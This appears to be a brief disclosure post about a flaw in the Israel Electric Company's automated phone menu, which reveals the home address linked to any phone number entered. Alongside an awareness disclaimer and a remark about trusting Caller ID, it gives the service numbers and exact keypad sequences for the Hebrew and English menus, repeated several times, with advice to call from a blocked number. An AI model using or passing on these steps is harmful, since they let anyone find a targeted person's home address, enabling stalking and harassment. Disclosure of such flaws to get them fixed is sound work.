~~This article is for awarness only, don't use it to gain information about other people~~~~
As part of my ongoing project about Caller ID I'm sharing this data.
The IEC (Israel Electric Company) is exposing the physical address of the clients, with or without the needs of spoof call.
All the attacker needs to know is the phone number, known or unknown target.
Later, he can type it in the IVR system, where client can inform about problems.
As a results, the IVR system is sharing the address which is connected to this phone number.
Since
most of us, have electric power connected to our houses, and bill to
pay - it's really hard to prevent it, even in situation when the
privacy is important
Calling the IEC is very simple:
Short number from Israel 103
Local and international:
+972(0)4-8187100
~~~~~~~~~~~~~~~~~~~~~
Exploit for address in Hebrew
Call from blocked number and then
103;1;1;*;{target phone number},#;1
Local and international:
+972(0)4-8187100
~~~~~~~~~~~~~~~~~~~~~
Exploit for address in Hebrew
Call from blocked number and then
103;1;1;*;{target phone number},#;1
+972(0)4-8187100;1;1;*;{target phone number},#;1
~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
Exploit for address in English
Call from blocked number and then
103;2;1;*;{client phone number},#;1
Call from blocked number and then
103;2;1;*;{client phone number},#;1
+972(0)4-8187100;2;1;*;{client phone number},#;1
~~~~~~~~~~~~~~~~~~~~~
The IEC already in the loop, so I hope they will fix it sooner then later.
We must understand that our dependency on Caller ID is totaly worng, just like missing of SSL in web services.
In
this case study, potenial actor don't have to change the caller ID in
order to get data, so it's very good lesson of what to avoid.
It seems that this problem came after an idea to make better service to the clients